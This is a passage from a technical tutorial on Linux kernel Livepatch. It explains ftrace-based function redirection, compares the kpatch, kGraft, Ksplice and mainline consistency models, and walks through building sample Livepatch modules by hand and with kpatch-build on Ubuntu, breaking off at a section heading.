While this may sound like sorcery for some, this is a very real feature, called Livepatch. Livepatch uses ftrace in new and interesting ways, by patching in calls at the beginning of existing functions to new patched functions, delivered as kernel modules.

This lets you update and fix bugs on the fly, although its use is typically reserved for security critical fixes only.

The whole concept is extremely interesting, so today we will look into what Livepatch is, how it is implemented across several distros, we will write some Livepatches of our own, and look at how Livepatch works in Ubuntu for end users.

Why Do We Need Livepatch?

Working in Sustaining Engineering at Canonical, it is pretty common to see bug reports from machines which have very high uptimes, such as six to twelve months, or sometimes even longer.

These machines normally run important workloads which can’t be interrupted for a reboot, since they might be a part of critical public infrastructure, or a busy build system. The Ubuntu Kernel Team typically releases a new updated kernel for each distribution release on a 3 week SRU cycle with additional updates always within a day of two of a new CVE being released.

Machines with important workloads aren’t going to want to reboot every six months, let alone every three weeks for each new kernel release. Keeping these machines safe and up to date with security fixes is a must, and this is the motivation behind Livepatch.

What is Livepatch?

Livepatch is the ability for the kernel to change the flow of code execution from a broken or vulnerable function, to a new, fixed function during runtime.

In most cases, the new function is the exact same as the function it is replacing, but with minor changes, such as adding a check for null, or changing the order of some locks or adding a quick logic fix.

The code redirection is achieved with ftrace. ftrace is a tool which lets you trace kernel function calls, but it can also add and remove instructions from functions as well. A good example is kprobes, which can patch in blocks of code to existing functions, usually used to print debug values. kprobes are mostly ftrace based these days, which is important, since we don’t want kprobes and Livepatch to clash and patch the same function at the same time, so ftrace controls function consistency.

Livepatch is implemented by compiling the new fixed function into a kernel module and loading it into the system. ftrace is then used to redirect calls from the old function to the new function in the kernel module. This process actually has to be done very carefully, and we will discuss it in the next section, when we cover different consistency models.

For the actual implementation, it is remarkably simple.

Have you ever disassembled a kernel function before and wondered why every kernel function begins with a full sized padded nop instruction?

For example, let’s look at sysrq_handle_crash(), as seen in my previous article Beginning Kernel Crash Debugging on Ubuntu 18.10.

Well, what ftrace does is patch out the nop with a call which points towards the new function. If you look carefully, the nop is located before the function starts manipulating the stack, which means everything is consistent, and very elegant.

Credit and license for image

The above image demonstrates this behaviour very well. Now, this technique works great at a function level, where logic changes but data does not.

Limitations quickly arise within Livepatch when data changes are required. If a new member is needed to be added or removed from a struct implemented within the function or the file, these changes cannot be passed onto the Livepatched version, since you cannot modify data structures during runtime, as they may be in use by different tasks on different cpus. The same goes for changing the function signature, since the calling function would have to rearrange variables pushed on the stack. Livepatch is also limited to modifying functions which are traceable by ftrace, and not all kernel functions can be traced.

Because of these limitations, and the complexity that arises from consistency models which we will discuss about next, Livepatch is more of a temporary band-aid solution, reserved for fixing critical security issues until such a time comes when the host can be rebooted into a updated kernel.

Consistency Models and Varying Implementations

As mentioned in the previous section, the real complexity behind Livepatch is the decision making process required when ftrace actually performs the switch from the old function to the new function.

Say the changes to the new function are basic. Adding a null pointer check sort of basic. The semantics of the function itself haven’t changed, and there is no existing state to manage. All we have to do then is check to see if any tasks are running which are using the old function. This can be done by examining the stack of sleeping tasks. If the function is not found in any of them, we can easily patch the change in.

But what happens if a task is using the old function? Do we make a rule and say all tasks must be stopped, we patch, and then start them all again? Or do we add complexity by adding a list of tasks that use the old function, and tasks that use the new function, and maintain a trampoline which decides between each function for a given task?

What happens if the Livepatch changes the order that locks are acquired and released? The affected tasks which hold those locks need to be patched when the locks are no longer held, and the entire system needs to switch over to the new function at the same time. How do we co-ordinate this?

This is where consistency models come in, and is the driving force behind the different implementations of Livepatch. Each distribution has its own opinion on how things should be done, and we will look at all of them.

kpatch

kpatch is developed by Red Hat, and uses the simplest consistency model. kpatch operates pretty much as previously explained, by using ftrace to change the nop instruction in the old function to a call instruction, pointing to the new function.

kpatch keeps the system consistent by first stopping all running tasks. The stack traces of each task is then examined. If the old function is not found in any of the tasks stack traces, then ftrace applies the patch, and all future calls to the patched function will use the new function.

This approach is atomic and safe, since there is only one view of the function at a time, it is either old, or new. There are no consistency issues that arise if the new function changes data structures differently to the old function, and the structure is passed to tasks which haven’t been migrated to the new function.

The limitations of kpatch involve not being able to modify data structures, and if a process is still using the patched function, patching fails, and all tasks are restarted again, to attempt the patch at a later time. There is some overhead in stopping and starting all tasks, which results in a small loss of service as those tasks are stopped.

kGraft

kGraft is developed by SUSE, and is by far the most complex consistency model. kGraft employs a per task consistency model, where all tasks remain running on the system, and tasks are patched one by one. This gives no downtime at all, since all tasks keep running during Livepatch, and patching can never “fail” in entirety.

kGraft achieves this by maintaining consistent “world views” to userspace processes, kernel threads and interrupt handlers, during their execution in kernel space.

For example, let’s say we have a userspace process making a syscall, and a Livepatch request came in midway through this syscall.

If the syscall involved calling the function which will be patched multiple times, on subsequent calling of the patched function, the semantics might have changed since the first time it was executed. If locking orders have changed, we might be facing a deadlock, which will end in certain failure.

Instead, what kGraft does is insert a trampoline which is the target of the call instruction which is replacing the nop. The trampoline points to both the old function and the new function. If the task has not yet been migrated to use the new function, the trampoline jumps to the old function and execution continues. If the task has been migrated, then the new function is called.

This means that any userspace process in a syscall, or kernel task, or interrupt handler still in kernel space will always use the old function.

This continues until each user space process finishes it syscall, or kernel task completes, or interrupt handler completes. At this stage, that task is then migrated over to the new function. When all tasks have been migrated, the trampoline is removed, and the call instruction is updated to point directly to the new function.

The benefits of kGraft is that all tasks are kept running during Livepatch. Downsides include keeping two different implementations of the same function around at the same time. This can cause problems when long running processes, like those waiting on disk or network I/O get stuck in kernel space, and won’t be patched until they complete. This can lead to inconsistencies if the new function changes internal data structures differently to the original, since both functions can still be executed in parallel.

Ksplice

Ksplice is developed by Oracle, and has a consistency model similar to kpatch. Ksplice stops all tasks before patching the functions atomically.

The differentiating feature to Ksplice, is the ability to patch functions which require changes to data structures. This process is not automatic though, as a programmer must implement extra code to the Livepatch module which handles the transition from the old data structure to the new.

Livepatch (Mainline Linux)

Livepatch was mainlined into the Linux kernel during the 4.0 development cycle.

The Livepatch implementation is a hybrid between the kpatch and kGraft implementations, taking the best ideas from both. Livepatch uses kGraft’s per task consistency and syscall exit migration, alongside kpatch’s stack trace based switching.

Patches are applied on a per task basis, one task at a time. There is no downtime as tasks do not need to be stopped. This also means that the trampoline based solution is used.

The consistency model for mainline operates in a set of steps:

Firstly, the stack trace of sleeping tasks is checked. If the function to be patched is not found in the stack trace, the task is patched to use the new function. If this fails for a particular task, it will re-examine the stack trace periodically and attempt to patch at a later time. Most, if not all tasks will be patched in this step.
The second step is to patch the task once it completes and exits from kernel space, such as a syscall finishing or a interrupt handler completing. This is useful for long running I/O or cpubound tasks. In some cases, SIGSTOP must be issued to I/O bound tasks to force it to exit the kernel, be patched, and then send SIGCONT so it can continue.
For the kernel “swapper” task, which is executed whenever the CPU is idle and never exits the kernel, it has a special klp_update_patch_state() call in the idle loop which patches the task before the CPU enters the idle state.

What Consistency Model Does Ubuntu Use?

Ubuntu uses the Livepatch (mainline) consistency model, which has the best of both kpatch and kGraft. All code is the same as what is shipped in the mainline kernel, and there are no custom changes.

Writing our Own Livepatches

Now that we have learned a bit about what Livepatch is, how it works, and the careful consideration that goes into selecting a consistency model, let’s start making some Livepatches of our own.

Structure of a Livepatch

For our first Livepatch, I think we will follow the sample which is provided in the mainline kernel. Download a copy of livepatch-sample.c and have a read.

Note, the Livepatch API has changed over time, so if you want to build for 4.4 Xenial, use the livepatch-sample.c from the Xenial kernel sources. If you get an error insmod: ERROR: could not insert module livepatch-sample.ko: Invalid parameters then you are using the wrong Livepatch API.

I am going to explain the latest API, as found in 5.4 Focal.

#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/livepatch.h>

#include <linux/seq_file.h>
static int livepatch_cmdline_proc_show(struct seq_file *m, void *v)
{
	seq_printf(m, "%s\n", "this has been live patched");
	return 0;
}

static struct klp_func funcs[] = {
	{
		.old_name = "cmdline_proc_show",
		.new_func = livepatch_cmdline_proc_show,
	}, { }
};

static struct klp_object objs[] = {
	{
		/* name being NULL means vmlinux */
		.funcs = funcs,
	}, { }
};

static struct klp_patch patch = {
	.mod = THIS_MODULE,
	.objs = objs,
};

static int livepatch_init(void)
{
	return klp_enable_patch(&patch);
}

static void livepatch_exit(void)
{
}

module_init(livepatch_init);
module_exit(livepatch_exit);
MODULE_LICENSE("GPL");
MODULE_INFO(livepatch, "Y");

As you can already see, since the Livepatch is a kernel module, it follows the same process required when writing a kernel module. We #include the kernel module header files of linux/module.h and linux/kernel.h, and declare our module_init() and module_exit() function pointers.

To say we are making a Livepatch, we also include linux/livepatch.h, set the module info marco to livepatch, Y and have the module init function call klp_enable_patch(), the entry point to the Livepatch subsystem.

Declaring the Livepatch itself is pretty simple. In this example, we will patch cmdline_proc_show(), the function which retruns the kernel commandline when you read from /proc/cmdline.

We define a new function, livepatch_cmdline_proc_show(), and give the “fixed” implementation. We then map the new function to the old function by defining a struct of type klp_func, in this case called funcs[], and filling in the members .old_name and .new_func.

Since we might need to replace more than one function in our Livepatch, we can create many of these function mappings, since funcs[] is an array.

We then tell Livepatch what to patch with struct klp_object. We set .funcs to our array of functions, and set .name to be another Livepatch module this has a dependency on, or simply NULL if we want to target vmlinux.

Finally, this is wrapped into a struct klp_patch, where we declare the module name, and the object struct. This is the struct we pass a reference to when klp_enable_patch() is called.

We can build the module with the following Makefile:

obj-m := livepatch-sample.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
	$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
	$(MAKE) -C $(KDIR) M=$(PWD) clean

You need to install a compiler, and the kernel header for your running kernel:

$ sudo apt install linux-headers-`uname -r`
$ sudo apt install build-essential

Then go ahead and run make:

$ make
make -C /lib/modules/5.4.0-21-generic/build M=/home/ubuntu/simple modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-21-generic'
  CC [M]  /home/ubuntu/simple/livepatch-sample.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC [M]  /home/ubuntu/simple/livepatch-sample.mod.o
  LD [M]  /home/ubuntu/simple/livepatch-sample.ko
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-21-generic'

I did this on Focal, but this should work on any Ubuntu kernel from 4.4 Xenial and upward, as they all have Livepatch enabled.

We then have the end result, livepatch-sample.ko. Lets do a before and after read of /proc/cmdline as we load the module:

$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-5.4.0-21-generic root=UUID=f9f909c3-782a-43c2-a59d-c789656b4188 ro
$ sudo insmod livepatch-sample.ko
$ cat /proc/cmdline
this has been live patched

How cool is that? We have successfully Livepatched our system. Checking dmesg shows us the progress of Livepatch:

[   33.100762] livepatch_sample: loading out-of-tree module taints kernel.
[   33.100764] livepatch_sample: tainting kernel with TAINT_LIVEPATCH
[   33.100793] livepatch_sample: module verification failed: signature and/or required key missing - tainting kernel
[   33.111720] livepatch: enabling patch 'livepatch_sample'
[   33.114679] livepatch: 'livepatch_sample': starting patching transition
[   33.883586] livepatch: 'livepatch_sample': patching complete

Note, we didn’t sign our kernel module, which is why module verification failed. This is only really important if you are using secureboot. Otherwise, our kernel gained taint flags for loading the Livepatch module.

Making a Slightly More Complex Livepatch

The previous Livepatch example used a completely new basic function to write back a replaced kernel command line. What happens if we want to actually patch existing code?

The next example will follow along the case for using kpatch-build, using the primary example in the kpatch repository.

What we want to do is change how the text is displayed for VmallocChunk in /proc/meminfo. The following patch for Linux 5.4 makes it capitalised:

diff --git a/fs/proc/meminfo.c b/fs/proc/meminfo.c
index 8c1f1bb1a5ce..3053c1bce50d 100644
--- a/fs/proc/meminfo.c
+++ b/fs/proc/meminfo.c
@@ -117,7 +117,7 @@ static int meminfo_proc_show(struct seq_file *m, void *v)
 	seq_printf(m, "VmallocTotal:   %8lu kB\n",
 		   (unsigned long)VMALLOC_TOTAL >> 10);
 	show_val_kb(m, "VmallocUsed:    ", vmalloc_nr_pages());
-	show_val_kb(m, "VmallocChunk:   ", 0ul);
+	show_val_kb(m, "VMALLOCCHUNK:   ", 0ul);
 	show_val_kb(m, "Percpu:         ", pcpu_nr_pages());
 
 #ifdef CONFIG_MEMORY_FAILURE

Writing the Livepatch Ourselves

Okay, let’s follow a similar format to last time. Let’s copy the new function into our Livepatch template, like so:

#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/livepatch.h>

static int livepatch_meminfo_proc_show(struct seq_file *m, void *v)
{
        struct sysinfo i;
        unsigned long committed;
        long cached;
        long available;
        unsigned long pages[NR_LRU_LISTS];
        unsigned long sreclaimable, sunreclaim;
        int lru;

        si_meminfo(&i);
        si_swapinfo(&i);
        committed = percpu_counter_read_positive(&vm_committed_as);

        cached = global_node_page_state(NR_FILE_PAGES) -
                        total_swapcache_pages() - i.bufferram;
        if (cached < 0)
                cached = 0;

        for (lru = LRU_BASE; lru < NR_LRU_LISTS; lru++)
                pages[lru] = global_node_page_state(NR_LRU_BASE + lru);

        available = si_mem_available();
        sreclaimable = global_node_page_state(NR_SLAB_RECLAIMABLE);
        sunreclaim = global_node_page_state(NR_SLAB_UNRECLAIMABLE);

        show_val_kb(m, "MemTotal:       ", i.totalram);
        show_val_kb(m, "MemFree:        ", i.freeram);
        show_val_kb(m, "MemAvailable:   ", available);
        show_val_kb(m, "Buffers:        ", i.bufferram);
        show_val_kb(m, "Cached:         ", cached);
        show_val_kb(m, "SwapCached:     ", total_swapcache_pages());
        show_val_kb(m, "Active:         ", pages[LRU_ACTIVE_ANON] +
                                           pages[LRU_ACTIVE_FILE]);
        show_val_kb(m, "Inactive:       ", pages[LRU_INACTIVE_ANON] +
                                           pages[LRU_INACTIVE_FILE]);
        show_val_kb(m, "Active(anon):   ", pages[LRU_ACTIVE_ANON]);
        show_val_kb(m, "Inactive(anon): ", pages[LRU_INACTIVE_ANON]);
        show_val_kb(m, "Active(file):   ", pages[LRU_ACTIVE_FILE]);
        show_val_kb(m, "Inactive(file): ", pages[LRU_INACTIVE_FILE]);
        show_val_kb(m, "Unevictable:    ", pages[LRU_UNEVICTABLE]);
        show_val_kb(m, "Mlocked:        ", global_zone_page_state(NR_MLOCK));

#ifdef CONFIG_HIGHMEM
        show_val_kb(m, "HighTotal:      ", i.totalhigh);
        show_val_kb(m, "HighFree:       ", i.freehigh);
        show_val_kb(m, "LowTotal:       ", i.totalram - i.totalhigh);
        show_val_kb(m, "LowFree:        ", i.freeram - i.freehigh);
#endif

#ifndef CONFIG_MMU
        show_val_kb(m, "MmapCopy:       ",
                    (unsigned long)atomic_long_read(&mmap_pages_allocated));
#endif

        show_val_kb(m, "SwapTotal:      ", i.totalswap);
        show_val_kb(m, "SwapFree:       ", i.freeswap);
        show_val_kb(m, "Dirty:          ",
                    global_node_page_state(NR_FILE_DIRTY));
        show_val_kb(m, "Writeback:      ",
                    global_node_page_state(NR_WRITEBACK));
        show_val_kb(m, "AnonPages:      ",
                    global_node_page_state(NR_ANON_MAPPED));
        show_val_kb(m, "Mapped:         ",
                    global_node_page_state(NR_FILE_MAPPED));
        show_val_kb(m, "Shmem:          ", i.sharedram);
        show_val_kb(m, "KReclaimable:   ", sreclaimable +
                    global_node_page_state(NR_KERNEL_MISC_RECLAIMABLE));
        show_val_kb(m, "Slab:           ", sreclaimable + sunreclaim);
        show_val_kb(m, "SReclaimable:   ", sreclaimable);
        show_val_kb(m, "SUnreclaim:     ", sunreclaim);
        seq_printf(m, "KernelStack:    %8lu kB\n",
                   global_zone_page_state(NR_KERNEL_STACK_KB));
        show_val_kb(m, "PageTables:     ",
                    global_zone_page_state(NR_PAGETABLE));

        show_val_kb(m, "NFS_Unstable:   ",
                    global_node_page_state(NR_UNSTABLE_NFS));
        show_val_kb(m, "Bounce:         ",
                    global_zone_page_state(NR_BOUNCE));
        show_val_kb(m, "WritebackTmp:   ",
                    global_node_page_state(NR_WRITEBACK_TEMP));
        show_val_kb(m, "CommitLimit:    ", vm_commit_limit());
        show_val_kb(m, "Committed_AS:   ", committed);
        seq_printf(m, "VmallocTotal:   %8lu kB\n",
                   (unsigned long)VMALLOC_TOTAL >> 10);
        show_val_kb(m, "VmallocUsed:    ", vmalloc_nr_pages());
        show_val_kb(m, "VMALLOCCHUNK:   ", 0ul);
        show_val_kb(m, "Percpu:         ", pcpu_nr_pages());

#ifdef CONFIG_MEMORY_FAILURE
        seq_printf(m, "HardwareCorrupted: %5lu kB\n",
                   atomic_long_read(&num_poisoned_pages) << (PAGE_SHIFT - 10));
#endif

#ifdef CONFIG_TRANSPARENT_HUGEPAGE
        show_val_kb(m, "AnonHugePages:  ",
                    global_node_page_state(NR_ANON_THPS) * HPAGE_PMD_NR);
        show_val_kb(m, "ShmemHugePages: ",
                    global_node_page_state(NR_SHMEM_THPS) * HPAGE_PMD_NR);
        show_val_kb(m, "ShmemPmdMapped: ",
                    global_node_page_state(NR_SHMEM_PMDMAPPED) * HPAGE_PMD_NR);
        show_val_kb(m, "FileHugePages:  ",
                    global_node_page_state(NR_FILE_THPS) * HPAGE_PMD_NR);
        show_val_kb(m, "FilePmdMapped:  ",
                    global_node_page_state(NR_FILE_PMDMAPPED) * HPAGE_PMD_NR);
#endif

#ifdef CONFIG_CMA
        show_val_kb(m, "CmaTotal:       ", totalcma_pages);
        show_val_kb(m, "CmaFree:        ",
                    global_zone_page_state(NR_FREE_CMA_PAGES));
#endif

        hugetlb_report_meminfo(m);

        arch_report_meminfo(m);

        return 0;
}

static struct klp_func funcs[] = {
	{
		.old_name = "meminfo_proc_show",
		.new_func = livepatch_meminfo_proc_show,
	}, { }
};

static struct klp_object objs[] = {
	{
		/* name being NULL means vmlinux */
		.funcs = funcs,
	}, { }
};

static struct klp_patch patch = {
	.mod = THIS_MODULE,
	.objs = objs,
};

static int livepatch_init(void)
{
	return klp_enable_patch(&patch);
}

static void livepatch_exit(void)
{
}

module_init(livepatch_init);
module_exit(livepatch_exit);
MODULE_LICENSE("GPL");
MODULE_INFO(livepatch, "Y");

We can pretty much keep the same Makefile as last time:

obj-m := livepatch-meminfo.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
	$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
	$(MAKE) -C $(KDIR) M=$(PWD) clean

When we build, we see some unresolved symbols:

$ make
make -C /lib/modules/5.4.0-21-generic/build M=/home/ubuntu/meminfo modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-21-generic'
  CC [M]  /home/ubuntu/meminfo/livepatch-meminfo.o
/home/ubuntu/meminfo/livepatch-meminfo.c: In function ‘livepatch_meminfo_proc_show’:
/home/ubuntu/meminfo/livepatch-meminfo.c:19:9: error: implicit declaration of function ‘si_swapinfo’ [-Werror=implicit-function-declaration]
   19 |         si_swapinfo(&i);
      |         ^~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:20:51: error: ‘vm_committed_as’ undeclared (first use in this function)
   20 |         committed = percpu_counter_read_positive(&vm_committed_as);
      |                                                   ^~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:20:51: note: each undeclared identifier is reported only once for each function it appears in
/home/ubuntu/meminfo/livepatch-meminfo.c:23:25: error: implicit declaration of function ‘total_swapcache_pages’ [-Werror=implicit-function-declaration]
   23 |                         total_swapcache_pages() - i.bufferram;
      |                         ^~~~~~~~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:34:9: error: implicit declaration of function ‘show_val_kb’ [-Werror=implicit-function-declaration]
   34 |         show_val_kb(m, "MemTotal:       ", i.totalram);
      |         ^~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:90:44: error: implicit declaration of function ‘vm_commit_limit’ [-Werror=implicit-function-declaration]
   90 |         show_val_kb(m, "CommitLimit:    ", vm_commit_limit());
      |                                            ^~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:117:44: error: ‘totalcma_pages’ undeclared (first use in this function); did you mean ‘totalram_pages’?
  117 |         show_val_kb(m, "CmaTotal:       ", totalcma_pages);
      |                                            ^~~~~~~~~~~~~~
      |                                            totalram_pages
/home/ubuntu/meminfo/livepatch-meminfo.c:122:9: error: implicit declaration of function ‘hugetlb_report_meminfo’; did you mean ‘arch_report_meminfo’? [-Werror=implicit-function-declaration]
  122 |         hugetlb_report_meminfo(m);
      |         ^~~~~~~~~~~~~~~~~~~~~~
      |         arch_report_meminfo
cc1: some warnings being treated as errors
make[2]: *** [scripts/Makefile.build:275: /home/ubuntu/meminfo/livepatch-meminfo.o] Error 1
make[1]: *** [Makefile:1719: /home/ubuntu/meminfo] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-21-generic'
make: *** [Makefile:5: default] Error 2

Not to worry! We are just missing some header files. Look at the symbols and use cscope to find what header files they live in, and #include them:

#include <linux/seq_file.h>
#include <linux/swap.h>
#include <linux/mman.h>
#include <linux/cma.h>
#include <linux/hugetlb.h>

Now lets build:

$ make
make -C /lib/modules/5.4.0-21-generic/build M=/home/ubuntu/meminfo modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-21-generic'
  CC [M]  /home/ubuntu/meminfo/livepatch-meminfo.o
/home/ubuntu/meminfo/livepatch-meminfo.c: In function ‘livepatch_meminfo_proc_show’:
/home/ubuntu/meminfo/livepatch-meminfo.c:38:9: error: implicit declaration of function ‘show_val_kb’ [-Werror=implicit-function-declaration]
   38 |         show_val_kb(m, "MemTotal:       ", i.totalram);
      |         ^~~~~~~~~~~
cc1: some warnings being treated as errors
make[2]: *** [scripts/Makefile.build:275: /home/ubuntu/meminfo/livepatch-meminfo.o] Error 1
make[1]: *** [Makefile:1719: /home/ubuntu/meminfo] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-21-generic'
make: *** [Makefile:5: default] Error 2

Unfortunately for us, this basic example calls show_val_kb(). This isn’t defined in any header files, and is actually local to fs/proc/meminfo.c.

static void show_val_kb(struct seq_file *m, const char *s, unsigned long num)
{
    seq_put_decimal_ull_width(m, s, num << (PAGE_SHIFT - 10), 8);
    seq_write(m, " kB\n", 4);
}

So close but so far! Now, these functions which are local to their modules don’t actually export their symbols to a stripped vmlinuz, which means we have a problem. Even if we try be cheeky and make a forward declaration and label it extern:

extern void show_val_kb(struct seq_file *m, const char *s, unsigned long num);

The compiler is onto us!

$ make
make -C /lib/modules/5.4.0-21-generic/build M=/home/ubuntu/meminfo modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-21-generic'
  CC [M]  /home/ubuntu/meminfo/livepatch-meminfo.o
  Building modules, stage 2.
  MODPOST 1 modules
ERROR: "arch_report_meminfo" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "hugetlb_report_meminfo" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "totalcma_pages" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "num_poisoned_pages" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "pcpu_nr_pages" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "vmalloc_nr_pages" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "vm_commit_limit" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "show_val_kb" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "total_swapcache_pages" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "vm_committed_as" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: "si_swapinfo" [/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
make[2]: *** [scripts/Makefile.modpost:94: __modpost] Error 1
make[1]: *** [Makefile:1632: modules] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-21-generic'
make: *** [Makefile:5: default] Error 2

While the module object builds, it cannot be linked, since the compiler does not know the offsets or locations of the functions which reside in the unstripped vmlinux / stripped vmlinuz binaries.

So, how do we fix this? I struggled with this issue for quite a long time, until I went back and read the Livepatch documentation more closely.

From Documentation/livepatch/livepatch.txt:

The patch contains only functions that are really modified. But they
might want to access functions or data from the original source file
that may only be locally accessible. This can be solved by a special
relocation section in the generated livepatch module, see
Documentation/livepatch/module-elf-format.txt for more details.

If you go ahead and read Documentation/livepatch/module-elf-format.txt, we find that we need to add ELF sections to the object file which tell the kernel Livepatch subsystem how to apply relocations for each of these functions into the kernel we are targeting.

There are two ELF sections that need adding;

SHF_RELA_LIVEPATCH
SHN_LIVEPATCH

SHF_RELA_LIVEPATCH is used to declare the functions which need to be redirected with ftrace, that is, the functions that are actually being Livepatched.

SHN_LIVEPATCH are all the local symbols that the fixed function calls, and need to be fixed up.

Each section needs entries of the from:

.klp.rela.objname.section_name

An example for SHF_RELA_LIVEPATCH would be:

.klp.rela.vmlinux.text.meminfo.proc_show

These ELF sections need to know the addresses and offsets from the vmlinux binary.

Now, inserting these by hand is actually really hard, and does not scale at all.

This is the idea behind kpatch-build, and automated build program which can generate Livepatches from source diffs, and programatically fetch and insert these ELF sections which contain the symbol relocation tables.

Using kpatch-build to Generate the Livepatch

Firstly we need to download and build kpatch-build:

$ sudo apt install dpkg-dev devscripts elfutils ccache
$ sudo apt build-dep linux
$ git clone https://github.com/dynup/kpatch.git
$ cd kpatch
$ make

The next step is to download the ddeb (debug-deb) package for the kernel we wish to make a Livepatch module for. A list of all kernel ddeb packages can be found at the ddeb package repository.

I will be targeting 5.4.0-24-generic, so I need to download linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb.

$ wget http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb
$ sudo dpkg -i linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb

The resulting debug vmlinux will be placed at /lib/debug/boot/vmlinux-5.4.0-24-generic.

kpatch-build operates on source diffs. Save the diff to ~/meminfo-string.patch like so:

$ cat ~/meminfo-string.patch 
diff --git a/fs/proc/meminfo.c b/fs/proc/meminfo.c
index 8c1f1bb1a5ce..3053c1bce50d 100644
--- a/fs/proc/meminfo.c
+++ b/fs/proc/meminfo.c
@@ -117,7 +117,7 @@ static int meminfo_proc_show(struct seq_file *m, void *v)
 	seq_printf(m, "VmallocTotal:   %8lu kB\n",
 		   (unsigned long)VMALLOC_TOTAL >> 10);
 	show_val_kb(m, "VmallocUsed:    ", vmalloc_nr_pages());
-	show_val_kb(m, "VmallocChunk:   ", 0ul);
+	show_val_kb(m, "VMALLOCCHUNK:   ", 0ul);
 	show_val_kb(m, "Percpu:         ", pcpu_nr_pages());
 
 #ifdef CONFIG_MEMORY_FAILURE
 

Now we are ready to build!

Run the following command:

$ kpatch/kpatch-build/kpatch-build -t vmlinux --vmlinux /lib/debug/boot/vmlinux-5.4.0-24-generic  ~/meminfo-string.patch 
Using cache at /home/matthew/.kpatch/src
Testing patch file(s)
Reading special section data
readelf: Error: LEB value too large
readelf: Error: LEB value too large
Building original source
Building patched source
Extracting new and modified ELF sections
meminfo.o: changed function: meminfo_proc_show
Patched objects: vmlinux
Building patch module: livepatch-meminfo-string.ko
SUCCESS

kpatch-build works by first downloading the source archive of the kernel you are targeting, which is determined by the vmlinux package you pass in. From there, the standard vmlinux is built normally. Once that completes, the source tree is patched with the patch you specified, and rebuilt. Since most patches are small, only changed object files are rebuilt. In this case, only meminfo.o gets rebuilt.

Since we now know that only meminfo.o got changed, the single object is compiled again with -ffunction-sections -fdata-sections in both the patched and unpatched forms.

Then each unpatched and patched object set is then analysed by create-diff-object to determine what functions have been modified, and to extract the changed functions. This program also checks for Livepatch compatibility.

The really special part of create-diff-object is that it creates the necessary ELF symbol relocation sections to the patched objectfile.

It adds kpatch.funcs and .rela.kpatch.funcs which tell ftrace what functions are actually going to be Livepatched.

It adds .kpatch.dynrelas and .rela.kpatch.dynrelas which are used to fixup symbol relocations for local function calls in the fixed function to symbols in vmlinux.

From there, kpatch-build generates a new kernel module containing all Livepatches, which is ready to be used.

Let’s test it out shall we?

$ sudo insmod livepatch-meminfo-string.ko
$ grep -i chunk /proc/meminfo
VMALLOCCHUNK:          0 kB

It worked! Great! Let’s see what dmesg has to say:

[ 5611.674220] livepatch_meminfo_string: loading out-of-tree module taints kernel.
[ 5611.674223] livepatch_meminfo_string: tainting kernel with TAINT_LIVEPATCH
[ 5611.674259] livepatch_meminfo_string: module verification failed: signature and/or required key missing - tainting kernel
[ 5611.856109] livepatch: enabling patch 'livepatch_meminfo_string'
[ 5611.859603] livepatch: 'livepatch_meminfo_string': starting patching transition
[ 5611.860277] livepatch: 'livepatch_meminfo_string': patching complete

Pretty much the same as last time.

As for those ELF sections, we can examine the kernel module to see them:

$ readelf --sections livepatch-meminfo-string.ko 
There are 52 section headers, starting at offset 0xac7e8:

Section Headers:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags  Link  Info  Align
...
  [20] .kpatch.funcs     PROGBITS         0000000000000000  00001fa8
       0000000000000038  0000000000000000   A       0     0     8
  [21] .rela.kpatch.func RELA             0000000000000000  00001fe0
       0000000000000048  0000000000000018   I      48    20     8
...
  [51] .klp.rela.vmlinux RELA             0000000000000000  000ac308
       00000000000004e0  0000000000000018 AIo      48    10     8

$ readelf --relocs livepatch-meminfo-string.ko
...
Relocation section '.klp.rela.vmlinux..text.meminfo_proc_show' at offset 0xac308 contains 52 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
00000000003f  005400000004 R_X86_64_PLT32    0000000000000000 .klp.sym.vmlinux.si_sw - 4
000000000046  005500000002 R_X86_64_PC32     0000000000000000 .klp.sym.vmlinux.vm_co + 4
...

Using Livepatch to Fix A Real Bug

